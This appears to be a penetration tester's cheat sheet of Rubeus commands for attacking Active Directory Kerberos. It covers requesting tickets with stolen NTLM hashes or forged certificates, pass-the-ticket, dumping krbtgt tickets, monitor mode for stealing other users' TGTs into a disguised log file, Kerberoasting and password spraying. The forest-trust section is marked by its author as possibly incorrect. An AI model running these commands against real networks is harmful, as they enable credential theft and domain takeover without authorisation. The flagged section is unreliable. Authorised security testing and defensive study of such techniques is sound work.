#
Rubeus.exe
Rubeus is wonderful for playing with hashes and Kerberos tickets.
#
Request a TGT
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrapTIP
Note: if doing asktgt for a domain controller be sure to use the trailing dollar sign, i.e. DC01$
#
Request a TGT with a pfx file (ESC1)
You'd do this, for example, after abusing ESC1 or ESC8 with certify.exe.
Rubeus.exe asktgt /user:ad-user-you-chose-to-impersonate-with-certify.exe-command /certificate:cert.pfx /ptt
#
Request a TGT with a pfx file (ESC8)
certipy auth -pfx blah.pfx -domain domain.com
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap
rubeus.exe ptt /ticket:THE-PTDC01-TGT-YOU-COPIED-TO-YOUR-CLIPBOARD-EARLIER
#
Request a TGT when abusing forest trusts [ UNDER REVIEW ]
DANGER
I was working on this in a lab and don't think this section below is right, so ignore it until further review.
If you're in a situation where you've got DA on DOMAIN2.COM and want to abuse that to pwn DOMAIN1.COM, and you've extracted domain SIDs with get-adobject and you've extracted trust keys with mimikatz, you can do something like this to request a TGT for the pwned domain:
rubeus.exe asktgt /user:domain2$ /domain:domain1.com /rc4:THE-rc4_hmac_nt-YOU-EXTRACTED-WITH-MIMIKATZ /nowrap
#
Dump tickets on a local machine
rubeus.exe dump /service:krbtgt /nowrap
#
Monitor mode on a local machine
This is handy when you're WinRM'd into a box with local/domain admin creds and you want to steal other TGTs:
rubeus monitor /interval:5 /nowrap /runfor:60 /registry:SOFTWARE\MONITOR
#
Monitor mode - save to disk
If for some reason the TGTs won't write to registry, try this to write to disk:
rubeus monitor /interval:5 /nowrap /runfor:60 /consoleoutfile:c:\users\public\some-innocent-looking-file.log"
#
Extracting TGTs from registry hives after monitor mode attack
Once you've done the monitor "attack" and captured TGTs to the registry, use reg.exe to extract them:
reg export HKLM\SOFTWARE\MONITOR backup1.reg TIP
Once you have the TGTs, use something like rubeus2ccache to convert to kirbi or ccache (reference). Then you can use rubeus to pass the TGT.
#
Describe a ticket
rubeus.exe describe /ticket:base64ticketThis came in real handy during an engagement where I had lifted a TGT from a system and was trying to pass it and use it and was getting all sorts of errors. When I ran the describe command the output said KeyType=180 which I learned means credential guard is in place and that ticket won't work anywhere else but the box it came from!
#
Pass-the-ticket
rubeus.exe ptt /ticket:xxx
#
Kerberoasting attack
rubeus.exe kerberoast /simple /outfile:kerberoast.txt
#
Password spraying
rubeus.exe spray /password:MySprayedPass2024! /domain:domain.com /dc:1.2.3.4 /outfile:successful-sprays.txt